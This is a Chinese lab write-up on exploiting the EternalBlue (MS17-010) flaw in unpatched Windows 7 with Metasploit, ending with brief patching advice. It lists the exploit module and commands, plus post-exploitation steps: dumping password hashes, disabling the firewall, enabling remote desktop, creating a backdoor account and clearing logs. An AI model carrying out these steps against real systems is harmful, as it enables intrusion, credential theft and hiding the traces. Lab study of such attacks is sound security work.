前言：

提到操作系统漏洞，大家肯定听说过耳熟能详的永恒之蓝（MS17-010）了，他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA（National Security Agency，美国国家安全局）泄露的危险漏洞“EternalBlue”（永恒之蓝）进行传播 。勒索病毒肆虐，俨然是一场全球性互联网灾难，给广大电脑用户造成了巨大损失。最新统计数据显示，100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。

实验环境：

工具：metasploit

靶机两台：windows 7sp1和kali2020

攻击机IP地址：192.168.29.131

被攻击机IP地址：192.168.29.128

实验条件：两台机子可以互通的，并且windows 7sp1（无补丁）开启了445端口，防火墙是关闭的。

步骤：

1、在kali里面打开metasploit漏洞利用框架

2、搜索ms17-010漏洞利用模块 search 17-010

找到exploit/windows/smb/ms17_010_eternalblue

其中exploit具有攻击性，auxliary是用来验证的。

3、使用利用模块use+exploit/windows/smb/ms17_010_eternalblue

4、查看配置项 show options

5、设置 靶机IP地址（RHOST），攻击机IP地址（LHOST）

再次查看配置项

6、实施攻击exploit/run

7、攻入目标主机

Meterpreter 是 Metasploit 的一个扩展模块，可以调用 Metasploit 的一些功能，
对目标系统进行更深入的渗透，如获取屏幕、上传/下载文件、创建持久后门等。

在攻击进去的情况下演示几个功能

1、查看目标主机的操作系统信息（sysinfo）

2、对目标主机的屏幕进行截图（截图保存在/root下）

3、查看目标主机所有的用户名和密码（密码显示为hash值）

4、获取shell页面

乱码解决方法：

输入chcp 65001可将乱码解决

5、关闭防火墙

6、关闭Telnet服务

7、用两种方法开启远程桌面服务，并查看远程桌面功能启用情况

（1）方法1：rungetgui  -e

（2）方法2：runpost/windows/manage/enable_rdp

到windows7sp1上查看远程桌面功能启用情况

8、创建系统用户（创建用户名为：test，密码为：123456）

9、清除日志

修复方案

关闭445端口。

打开防火墙，安装安全软件。

安装对应补丁。

总结

为了维持操作系统的安全，我们能做到的是及时更新，安装补丁，关闭不必要的服务和端口。

来源：freebuf.com 2021-05-24 20:02:50 by: Zxl2605